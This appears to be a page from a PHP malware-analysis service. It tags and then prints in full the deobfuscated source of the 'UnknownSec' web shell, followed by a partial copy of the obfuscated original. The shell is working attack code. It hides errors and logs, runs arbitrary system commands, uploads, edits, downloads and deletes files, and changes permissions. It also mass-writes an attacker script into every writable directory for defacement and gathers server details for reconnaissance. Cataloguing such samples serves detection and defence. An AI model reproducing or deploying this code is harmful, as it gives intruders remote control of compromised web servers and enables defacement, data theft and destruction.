PHP Malware Analysis

Back to list

Tags

Emails
unknownsec1337@gmail.com
Title
" . $_SERVER['HTTP_HOST'] . " - {$▛} 403
Execution
system
exec
passthru
shell_exec
Input
_GET
_POST
Environment
set_time_limit
error_reporting
php_uname
getcwd

Deobfuscated code

<?php

/*	~ Gw doain kalo lu recode tytyd lu jadi kecil 
	~ v.02
	~ Special thanks to Michy Amrane
	~ Untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri. 
*/
set_time_limit(0);
error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if (isset($_GET['option']) && $_POST['opt'] == 'download') {
    header('Content-type: text/plain');
    header('Content-Disposition: attachment; filename="' . $_POST['name'] . '"');
    echo file_get_contents($_POST['path']);
    exit;
}
if (get_magic_quotes_gpc()) {
    foreach ($_POST as $key => $value) {
        $_POST[$key] = stripslashes($value);
    }
}
function ▟($dir, $p)
{
    if (isset($_GET['path'])) {
        $▚ = $_GET['path'];
    } else {
        $▚ = getcwd();
    }
    if (is_writable($▚)) {
        return "<font color='green'>" . $p . "</font>";
    } else {
        return "<font color='red'>" . $p . "</font>";
    }
}
function dc($dir, $p)
{
    if (isset($_GET['path'])) {
        $▚ = $_GET['path'];
    } else {
        $▚ = getcwd();
    }
    if (is_writable($▚)) {
        return "<font color='green'>" . $p . "</font>";
    } else {
        return "<font color='red'>" . $p . "</font>";
    }
}
function ip()
{
    $ipas = '';
    if (getenv('HTTP_CLIENT_IP')) {
        $ipas = getenv('HTTP_CLIENT_IP');
    } else {
        if (getenv('HTTP_X_FORWARDED_FOR')) {
            $ipas = getenv('HTTP_X_FORWARDED_FOR');
        } else {
            if (getenv('HTTP_X_FORWARDED')) {
                $ipas = getenv('HTTP_X_FORWARDED');
            } else {
                if (getenv('HTTP_FORWARDED_FOR')) {
                    $ipas = getenv('HTTP_FORWARDED_FOR');
                } else {
                    if (getenv('HTTP_FORWARDED')) {
                        $ipas = getenv('HTTP_FORWARDED');
                    } else {
                        if (getenv('REMOTE_ADDR')) {
                            $ipas = getenv('REMOTE_ADDR');
                        } else {
                            $ipas = 'IP tidak dikenali';
                        }
                    }
                }
            }
        }
    }
    return $ipas;
}
function x($cmd)
{
    $▙ = '';
    if (function_exists('exec')) {
        @exec($cmd, $▙);
        $▙ = @join("\n", $▙);
    } elseif (function_exists('passthru')) {
        ob_start();
        @passthru($cmd);
        $▙ = ob_get_clean();
    } elseif (function_exists('system')) {
        ob_start();
        @system($cmd);
        $▙ = ob_get_clean();
    } elseif (function_exists('shell_exec')) {
        $▙ = shell_exec($cmd);
    } else {
        return "\xe2\x86\xb3 Unable to execute command\n";
    }
    return $▙ == '' ? "\xe2\x86\xb3 Query did not return anything\n" : $▙;
}
function p($file)
{
    $p = fileperms($file);
    if (($p & 0xc000) == 0xc000) {
        $i = 's';
    } elseif (($p & 0xa000) == 0xa000) {
        $i = 'l';
    } elseif (($p & 0x8000) == 0x8000) {
        $i = '-';
    } elseif (($p & 0x6000) == 0x6000) {
        $i = 'b';
    } elseif (($p & 0x4000) == 0x4000) {
        $i = 'd';
    } elseif (($p & 0x2000) == 0x2000) {
        $i = 'c';
    } elseif (($p & 0x1000) == 0x1000) {
        $i = 'p';
    } else {
        $i = 'u';
    }
    $i .= $p & 0x100 ? 'r' : '-';
    $i .= $p & 0x80 ? 'w' : '-';
    $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
    $i .= $p & 0x20 ? 'r' : '-';
    $i .= $p & 0x10 ? 'w' : '-';
    $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
    $i .= $p & 0x4 ? 'r' : '-';
    $i .= $p & 0x2 ? 'w' : '-';
    $i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
    return $i;
}
echo "\r\n<!DOCTYPE HTML>\r\n<html>\r\n\t<head>\r\n\t\t<meta name='author' content='{$▛}'>\r\n\t\t<meta name='robots' content='NOINDEX, NOFOLLOW'>\r\n\t\t<title>" . $_SERVER['HTTP_HOST'] . " - {$▛} 403</title>\r\n\t\t<meta name='viewport' content='width=device-width, initial-scale=0.60, user-scalable=no'>\r\n\t\t<link rel='stylesheet' href='//unknownsec1337.github.io/main/style_2.css'>\r\n\t</head>\r\n<body>\r\n<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\r\n<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>\r\n\t<div class='card text-dark'>\r\n\t\t<div class='card-header'>\r\n\t\t\t<a href='" . $_SERVER['PHP_SELF'] . "'><h4>{$▛} Bypass <i class='fas fa-biohazard'></i> <img alt='Bypass 403' src='//icons.getbootstrap.com/assets/icons/activity.svg' width='25px'> 403</h4></a>";
if (isset($_GET['path'])) {
    $path = $_GET['path'];
} else {
    $path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
    if ($pat == '' && $id == 0) {
        $a = true;
        echo "<i class=\"bi bi-hdd-rack\"></i> : <a href=\"?path=/\">/</a>";
        continue;
    }
    if ($pat == '') {
        continue;
    }
    echo "<a href=\"?path=";
    for ($i = 0; $i <= $id; $i++) {
        echo "{$paths[$i]}";
        if ($i != $id) {
            echo "/";
        }
    }
    echo '">' . $pat . '</a>/';
}
echo " [ " . ▟($path, p($path)) . " ]";
echo "\r\n\t\t<div class='dropdown'>\r\n\t\t\t\t<button class='btn btn-dark dropdown-toggle' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='bi bi-menu-down'></i>&nbsp;Menu</button>\r\n\t\t\t<div class='dropdown-menu'>\r\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=upload'><i class='bi bi-upload'></i> Upload</a>\r\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=depes'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>\r\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=delete'><i class='bi bi-trash'></i> Mass delete</a>\r\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=cmd'><i class='bi bi-terminal'></i> Terminal</a>\r\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=info'><i class='bi bi-info-circle'></i> Info server</a>\r\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=about'><i class='bi bi-info'></i> About</a></h5>\r\n\t\t\t</div>\r\n\t\t</div>\r\n\t</div>\r\n</div>";
// tools nya
if (isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    chdir($dir);
} else {
    $dir = getcwd();
}
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
for ($i = 0; $i <= $c_dir; $i++) {
    $scdir[$i];
    if ($i != $c_dir) {
    } elseif ($_GET['id'] == 'depes') {
        function mass_kabeh($dir, $namafile, $isi_script)
        {
            if (is_writable($dir)) {
                $dira = scandir($dir);
                foreach ($dira as $dirb) {
                    $dirc = "{$dir}/{$dirb}";
                    $▚ = $dirc . '/' . $namafile;
                    if ($dirb === '.') {
                        file_put_contents($▚, $isi_script);
                    } elseif ($dirb === '..') {
                        file_put_contents($▚, $isi_script);
                    } else {
                        if (is_dir($dirc)) {
                            if (is_writable($dirc)) {
                                echo "[<font color=green>success</font>] {$▚}<br>";
                                file_put_contents($▚, $isi_script);
                                $▟ = mass_kabeh($dirc, $namafile, $isi_script);
                            }
                        }
                    }
                }
            }
        }
        function mass_biasa($dir, $namafile, $isi_script)
        {
            if (is_writable($dir)) {
                $dira = scandir($dir);
                foreach ($dira as $dirb) {
                    $dirc = "{$dir}/{$dirb}";
                    $▚ = $dirc . '/' . $namafile;
                    if ($dirb === '.') {
                        file_put_contents($▚, $isi_script);
                    } elseif ($dirb === '..') {
                        file_put_contents($▚, $isi_script);
                    } else {
                        if (is_dir($dirc)) {
                            if (is_writable($dirc)) {
                                echo "[<font color=green>success</font>] {$dirb}/{$namafile}<br>";
                                file_put_contents($▚, $isi_script);
                            }
                        }
                    }
                }
            }
        }
        if ($_POST['start']) {
            if ($_POST['tipe'] == 'massal') {
                echo "<div style='margin: 5px auto; padding: 5px'>";
                mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
                echo "</div>";
            } elseif ($_POST['tipe'] == 'biasa') {
                echo "<div style='margin: 5px auto; padding: 5px'>";
                mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
                echo "</div>";
            }
        } else {
            echo "<br />{$▘}\r\n<form method='post'>\r\n\t<b>Tipe:</b><br>\r\n<div class='custom-control custom-switch'>\r\n\t<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>\r\n\t<label class='custom-control-label' for='customSwitch'>Biasa</label>\r\n</div>\r\n<div class='custom-control custom-switch'>\r\n\t<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>\r\n\t<label class='custom-control-label' for='customSwitch1'>Massal</label>\r\n</div>\r\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\r\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\r\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> Your script:</b>\r\n\t<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />\r\n\t<input type='submit' name='start' value='Go' class='btn btn-primary btn-block'>\r\n</form>";
        }
    } elseif ($_GET['id'] == 'info') {
        $disfunc = @ini_get("disable_functions");
        if (empty($disfunc)) {
            $disfc = "<font color=green>NONE</font>";
        } else {
            $disfc = "<font color=red>{$disfunc}</font>";
        }
        if (!function_exists('posix_getegid')) {
            $user = @get_current_user();
            $uid = @getmyuid();
            $gid = @getmygid();
            $group = "?";
        } else {
            $uid = @posix_getpwuid(posix_geteuid());
            $gid = @posix_getgrgid(posix_getegid());
            $user = $uid['name'];
            $uid = $uid['uid'];
            $group = $gid['name'];
            $gid = $gid['gid'];
        }
        $sm = @ini_get(strtolower("safe_mode")) == 'on' ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
        echo '<br />' . $▘ . '
<div class="container">
	<div class="card text-dark">
		<div class="card-header">';
        echo "<b>Uname: </b><font color=green>" . php_uname() . "</font><br />";
        echo "<b>Software: </b><font color=green>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br />";
        echo "<b>PHP version: </b><font color=green>PHP_VERSION</font> <b>PHP os:</b> <font color=green>PHP_OS</font><br />";
        echo "<b>Server Ip: </b><font color=green>" . gethostbyname($_SERVER['HTTP_HOST']) . "</font><br />";
        echo "<b>Your Ip: </b><font color=green>" . ip() . "</font><br />";
        echo "<b>User: </b><font color=green>{$user}</font> ({$uid}) | <b>Group:</b> <font color=green>{$group}</font> ({$gid})<br />";
        echo "<b>Safe Mode: </b>{$sm}<br />";
        echo "<kbd>Disable Function:</kbd><pre>{$disfc}</pre>";
        echo "</div>\r\n\t</div>\r\n</div>";
    } elseif ($_GET['id'] == 'about') {
        echo '<br />' . $▘ . '
<div class="container">
	<div class="card text-dark">
		<div class="card-header">';
        echo "<img alt='AnonSec Team' class='img-thumbnail rounded mx-auto d-block' src='//unknownsec1337.github.io/AnonSec.jpg' width='150px'>";
        echo "<b>- About Me -</b><br />";
        echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
        echo "</div>\r\n\t</div>\r\n</div>";
    } elseif ($_GET['id'] == 'cmd') {
        echo "<br />{$▘}\r\n<form method='post'>\r\n\t<div class='input-group mb-3'>\r\n\t\t<input type='text' class='form-control' name='cmd' placeholder='ls -la | id | uname -a'>\r\n\t<div class='input-group-append'>\r\n\t\t<input class='btn btn-primary' type='submit' name='id_cmd' value='Go'>\r\n\t</form>\r\n\t</div>\r\n</div>";
        if ($_POST['id_cmd']) {
            $cmd = $_POST['cmd'];
            echo "\r\n<div class='container'>\r\n\t<div class='card text-dark'>\r\n\t\t<div class='card-header'>\r\n\t\t\t<kbd><b>~\$</b> {$cmd}</kbd><pre>" . x($_POST['cmd']) . "</pre>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n";
        }
    } elseif ($_GET['id'] == 'upload') {
        echo '<br />' . $▘ . '
<form method="post" enctype="multipart/form-data">
	<div class="input-group mb-3">
		<div class="custom-file">
			<label class="custom-file-label" for="inputGroupFile04">
				<input class="custom-file-input" id="inputGroupFile04" type="file" name="file" onchange="this.form.submit()" multiple>
			</label>
		</div>
	</div>
</form>';
        if (isset($_FILES['file'])) {
            if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
                echo '
<script type="text/javascript">
Swal.fire(
  "Success",
  "Success upload",
  "success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
            } else {
                echo '
<script type="text/javascript">
Swal.fire(
  "Opsss",
  "Failed upload",
  "error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
            }
        }
    } elseif ($_GET['id'] == 'delete') {
        function hapus_massal($dir, $namafile)
        {
            if (is_writable($dir)) {
                $dira = scandir($dir);
                foreach ($dira as $dirb) {
                    $dirc = "{$dir}/{$dirb}";
                    $▚ = $dirc . '/' . $namafile;
                    if ($dirb === '.') {
                        if (file_exists("{$dir}/{$namafile}")) {
                            unlink("{$dir}/{$namafile}");
                        }
                    } elseif ($dirb === '..') {
                        if (file_exists("" . dirname($dir) . "/{$namafile}")) {
                            unlink("" . dirname($dir) . "/{$namafile}");
                        }
                    } else {
                        if (is_dir($dirc)) {
                            if (is_writable($dirc)) {
                                if (file_exists($▚)) {
                                    echo "[<font color=green>deleted</font>] {$▚}<br>";
                                    unlink($▚);
                                    $▟ = hapus_massal($dirc, $namafile);
                                }
                            }
                        }
                    }
                }
            }
        }
        if ($_POST['start']) {
            echo "<div style='margin: 5px auto; padding: 5px'>";
            hapus_massal($_POST['d_dir'], $_POST['d_file']);
            echo "</div>";
        } else {
            echo "<br />{$▘}\r\n<form method='post'>\r\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\r\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\r\n\t<div class='input-group mb-3'>\r\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>\r\n\t<div class='input-group-append'>\r\n\t<input class='btn btn-primary btn-block' type='submit' name='start' value='Go'>\r\n</form>\r\n\t</div>\r\n\t</div>";
        }
    }
}
// akhir tools
if (isset($_GET['filesrc'])) {
    echo "<br><b>name : </b>" . basename($_GET['filesrc']);
    "</br>";
    echo '<textarea class="form-control" rows="7" readonly> ' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea><br />';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
    echo '<br><b>name : </b>' . basename($_POST['path']);
    '</br>';
    //Chmod
    if ($_POST['opt'] == 'chmod') {
        if (isset($_POST['perm'])) {
            if (chmod($_POST['path'], $_POST['perm'])) {
                echo '
<script type="text/javascript">
Swal.fire(
  "Success",
  "Success Change Permission",
  "success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
            } else {
                echo '
<script type="text/javascript">
Swal.fire(
  "Opsss",
  "Failed change permission",
  "error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
            }
        }
        echo '<form method="POST">
	<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '"/>
	<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
		<input class="form-control" type="hidden" name="opt" value="chmod">
		<div class="input-group-append">
	<input class="btn btn-primary btn-block" type="submit" value="Go"/>
	</form>
	</div>
</div>';
    } elseif ($_GET['opt'] == 'btw') {
        $cwd = getcwd();
        echo '<form action="?option&path=' . $cwd . '&opt=delete&type=buat" method="POST">
	<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
	<input class="form-control" type="hidden" name="path" value="' . $cwd . '">
		<input class="form-control" type="hidden" name="opt" value="delete">
		<div class="input-group-append">
	<input class="btn btn-primary btn-block" type="submit" value="Go"/>
	</form>
	</div>
</div>';
    } elseif ($_POST['opt'] == 'rename') {
        if (isset($_POST['newname'])) {
            if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
                echo '
<script type="text/javascript">
Swal.fire(
  "Success",
  "Success change name",
  "success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
            } else {
                echo '
<script type="text/javascript">
Swal.fire(
  "Opsss",
  "Failed change name",
  "error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
            }
            $_POST['name'] = $_POST['newname'];
        }
        echo '<form method="POST">
	<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="' . $_POST['name'] . '" />
	<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
		<input class="form-control" type="hidden" name="opt" value="rename">
		<div class="input-group-append">
	<input class="btn btn-primary btn-block" type="submit" value="Go"/>
	</form>
	</div>
</div>';
    } elseif ($_POST['opt'] == 'edit') {
        if (isset($_POST['src'])) {
            $fp = fopen($_POST['path'], 'w');
            if (fwrite($fp, $_POST['src'])) {
                echo '
<script type="text/javascript">
Swal.fire(
  "Success",
  "Edit file Success",
  "success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
            } else {
                echo '
<script type="text/javascript">
Swal.fire(
  "Opsss",
  "Failed edit file",
  "error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
            }
            fclose($fp);
        }
        echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
	<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
		<input class="form-control" type="hidden" name="opt" value="edit">
	<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form><br />';
    }
    echo "</center>";
} else {
    echo "</table><br /><center>";
    //delete dir
    if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
        if ($_POST['type'] == 'dir') {
            if (rmdir($_POST['path'])) {
                echo '
<script type="text/javascript">
Swal.fire(
  "Success",
  "Success delete dir",
  "success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
            } else {
                echo '
<script type="text/javascript">
Swal.fire(
  "Opsss",
  "Failed delete dir",
  "error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
            }
        } elseif ($_POST['type'] == 'file') {
            if (unlink($_POST['path'])) {
                echo '
<script type="text/javascript">
Swal.fire(
  "Success",
  "Success delete file",
  "success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
            } else {
                echo '
<script type="text/javascript">
Swal.fire(
  "Opsss",
  "Failed delete file",
  "error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
            }
        }
    }
    echo "</center>";
    $scandir = scandir($path);
    $pa = getcwd();
    echo "<div class=\"container-fluid\"><table class=\"table table-striped table-bordered table-hover bg-white\" cellspacing=\"0\" cellpadding=\"7\" width=\"100%\">\r\n<tr>\r\n\t<th class=\"text-center bg-dark text-white\">Name</th>\r\n\t\t<th class=\"text-center bg-dark text-white\">Last edit</th>\r\n\t\t<th class=\"text-center bg-dark text-white\">Size</th>\r\n\t\t<th class=\"text-center bg-dark text-white\">Permission</th>\r\n\t<th class=\"text-center bg-dark text-white\">Options</th>\r\n</tr>\r\n</tr>\r\n<tr>";
    foreach ($scandir as $dir) {
        $dt = date("Y-m-d g:i:s", filemtime("{$path}/{$dir}"));
        if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
            continue;
        }
        echo "\r\n\t<tr>\r\n\t<td><img alt='folder' class='ico' src='//unknownsec1337.github.io/icon/folder.png'><a href=\"?path={$path}/{$dir}\">{$dir}</a></td>\r\n\t<td><center>{$dt}</center></td>\r\n\t<td><center>DIR</center></td>\r\n\t<td><center>";
        if (is_writable("{$path}/{$dir}")) {
            echo "<font color=\"green\">";
        } elseif (!is_readable("{$path}/{$dir}")) {
            echo "<font color=\"red\">";
        }
        echo p("{$path}/{$dir}");
        if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
            echo "</font>";
        }
        echo "</center></td>\r\n<td>\r\n<form method=\"POST\" action=\"?option&path={$path}\">\r\n<div class='input-group mb-3 text-center'>\r\n\t<select class=\"form-control\" style=\"width: 40%;\" name=\"opt\">\r\n\t\t<option selected disabled>Select</option>\r\n\t\t<option value=\"delete\">Delete</option>\r\n\t\t<option value=\"chmod\">Chmod</option>\r\n\t\t<option value=\"rename\">Rename</option>\r\n\t</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n\t<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n\t\t\t<div class='input-group-append'>\r\n\t\t\t<input class=\"btn btn-primary btn-block\" type=\"submit\" value=\"Go\"/>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n</td>\r\n</tr>";
    }
    foreach ($scandir as $file) {
        $ft = date("Y-m-d g:i:s", filemtime("{$path}/{$file}"));
        if (!is_file($path . '/' . $file)) {
            continue;
        }
        $s = filesize($path . '/' . $file) / 1024;
        $s = round($s, 3);
        if ($s >= 1024) {
            $s = round($s / 1024, 2) . ' MB';
        } else {
            $s .= ' KB';
        }
        echo "\r\n<tr>\r\n\t<td><img alt=\"file\" src=\"";
        $▖ = strtolower(pathinfo($file, PATHINFO_EXTENSION));
        if ($▖ == "htaccess") {
            echo "//unknownsec1337.github.io/icon/htaccess.png";
        } elseif ($▖ == "png" || $▖ == "jpg" || $▖ == "jpeg" || $▖ == "gif" || $▖ == "ico") {
            echo "//unknownsec1337.github.io/icon/images.png";
        } elseif ($▖ == "php") {
            echo "//unknownsec1337.github.io/icon/php.png";
        } elseif ($▖ == "ini") {
            echo "//unknownsec1337.github.io/icon/ini.png";
        } elseif ($▖ == "html") {
            echo "//unknownsec1337.github.io/icon/html.png";
        } elseif ($▖ == "js") {
            echo "//unknownsec1337.github.io/icon/js.png";
        } elseif ($▖ == "css") {
            echo "//unknownsec1337.github.io/icon/css.png";
        } elseif ($▖ == "json") {
            echo "//unknownsec1337.github.io/icon/json.png";
        } elseif ($▖ == "txt") {
            echo "//unknownsec1337.github.io/icon/txt.png";
        } elseif ($▖ == "sql") {
            echo "//unknownsec1337.github.io/icon/sql.png";
        } elseif ($▖ == "py") {
            echo "//unknownsec1337.github.io/icon/py.png";
        } elseif ($▖ == "pl") {
            echo "//unknownsec1337.github.io/icon/pl.png";
        } elseif ($▖ == "dat") {
            echo "//unknownsec1337.github.io/icon/dat.png";
        } elseif ($▖ == "md") {
            echo "//unknownsec1337.github.io/icon/md.png";
        } elseif ($▖ == "sh") {
            echo "//unknownsec1337.github.io/icon/sh.png";
        } elseif ($▖ == "zip") {
            echo "//unknownsec1337.github.io/icon/zip.png";
        } elseif ($▖ == "rar") {
            echo "//unknownsec1337.github.io/icon/rar.png";
        } elseif ($▖ == "xls") {
            echo "//unknownsec1337.github.io/icon/xls.png";
        } elseif ($▖ == "excel") {
            echo "//unknownsec1337.github.io/icon/excel.png";
        } elseif ($▖ == "word") {
            echo "//unknownsec1337.github.io/icon/word.png";
        } elseif ($▖ == "doc") {
            echo "//unknownsec1337.github.io/icon/doc.png";
        } elseif ($▖ == "mp4") {
            echo "//unknownsec1337.github.io/icon/mp4.png";
        } elseif ($▖ == "mp3") {
            echo "//unknownsec1337.github.io/icon/mp3.png";
        } elseif ($▖ == "pdf") {
            echo "//unknownsec1337.github.io/icon/pdf.png";
        } elseif ($▖ == "csv") {
            echo "//unknownsec1337.github.io/icon/csv.png";
        } else {
            echo "//unknownsec1337.github.io/icon/dflt.png";
        }
        echo "\" class=\"ico\">";
        echo "<a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\r\n\t<td><center>{$ft}</center></td>\r\n\t<td><center>{$s}</center></td>\r\n\t<td><center>";
        if (is_writable("{$path}/{$file}")) {
            echo "<font color=\"green\">";
        } elseif (!is_readable("{$path}/{$file}")) {
            echo "<font color=\"red\">";
        }
        echo p("{$path}/{$file}");
        if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
            echo "</font>";
        }
        echo "</center></td>\r\n\t<td>\r\n<form method=\"POST\" action=\"?option&path={$path}\">\r\n<div class='input-group mb-3 text-center'>\r\n<select class=\"form-control\" style=\"width: 40%;\" name=\"opt\">\r\n\t<option selected disabled>Select</option>\r\n\t\t<option value=\"delete\">Delete</option>\r\n\t\t<option value=\"edit\">Edit</option>\r\n\t\t<option value=\"rename\">Rename</option>\r\n\t\t<option value=\"chmod\">Chmod</option>\r\n\t<option value=\"download\">Download</option>\r\n</select>\r\n\t<input type=\"hidden\" name=\"type\" value=\"file\">\r\n\t\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n\t\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n\t\t<div class='input-group-append'>\r\n\t\t\t<input class=\"btn btn-primary btn-block\" type=\"submit\" value=\"Go\"/>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n</td>\r\n</tr>";
    }
}
echo "\r\n</table>\r\n<div class='card text-dark'>\r\n\t<div class='card-header text-center'>\r\n\t\t<kbd>Copyright &copy; " . date("Y") . " - <a href=''>{$▛}</a></kbd>\r\n\t</div>\r\n</div>\r\n<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\r\n<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>\r\n<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\r\n</body>\r\n</html>";


Original code

<?php
/*	~ Gw doain kalo lu recode tytyd lu jadi kecil 
	~ v.02
	~ Special thanks to Michy Amrane
	~ Untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri. 
*/
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if(isset($_GET['option']) && $_POST['opt'] == 'download'){
	header('Content-type: text/plain');
	header('Content-Disposition: attachment; filename="'.$_POST['name'].'"');
echo(file_get_contents($_POST['path']));
exit();
}
if(get_magic_quotes_gpc()){
	foreach($_POST as $key=>$value){
		$_POST[$key] = stripslashes($value);
	}
}
function ▟($dir,$p) {
if (isset($_GET['path'])) {
	$▚ = $_GET['path'];
} else {
	$▚ = getcwd();
}
if (is_writable($▚)) {
	return "<font color='green'>".$p."</font>";
} else {
	return "<font color='red'>".$p."</font>";
	}
}
function dc($dir,$p) {
if (isset($_GET['path'])) {
	$▚ = $_GET['path'];
} else {
	$▚ = getcwd();
}
if (is_writable($▚)) {
	return "<font color='green'>".$p."</font>";
} else {
	return "<font color='red'>".$p."</font>";
	}
}
function ip() {
	$ipas = '';
if (getenv('HTTP_CLIENT_IP'))
	$ipas = getenv('HTTP_CLIENT_IP');
else if(getenv('HTTP_X_FORWARDED_FOR'))
	$ipas = getenv('HTTP_X_FORWARDED_FOR');
else if(getenv('HTTP_X_FORWARDED'))
	$ipas = getenv('HTTP_X_FORWARDED');
else if(getenv('HTTP_FORWARDED_FOR'))
	$ipas = getenv('HTTP_FORWARDED_FOR');
else if(getenv('HTTP_FORWARDED'))
	$ipas = getenv('HTTP_FORWARDED');
else if(getenv('REMOTE_ADDR'))
	$ipas = getenv('REMOTE_ADDR');
else
	$ipas = 'IP tidak dikenali';
return $ipas;
}
function x($cmd) {
	$▙ = '';
if(function_exists('exec')) {
	@exec($cmd,$▙);
	$▙ = @join("\n",$▙);
}elseif (function_exists('passthru')) {
	ob_start();
	@passthru($cmd);
	$▙ = ob_get_clean();
}elseif (function_exists('system')) {
	ob_start();
	@system($cmd);
	$▙ = ob_get_clean();
}elseif (function_exists('shell_exec')) {
	$▙ = shell_exec($cmd);
}else return "↳ Unable to execute command\n";
	return ($▙==''?"↳ Query did not return anything\n":$▙);
}
function p($file){
$p = fileperms($file);
if (($p & 0xC000) == 0xC000) {
$i = 's';
} elseif (($p & 0xA000) == 0xA000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
	}
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ?
(($p & 0x0800) ? 's' : 'x' ) :
(($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
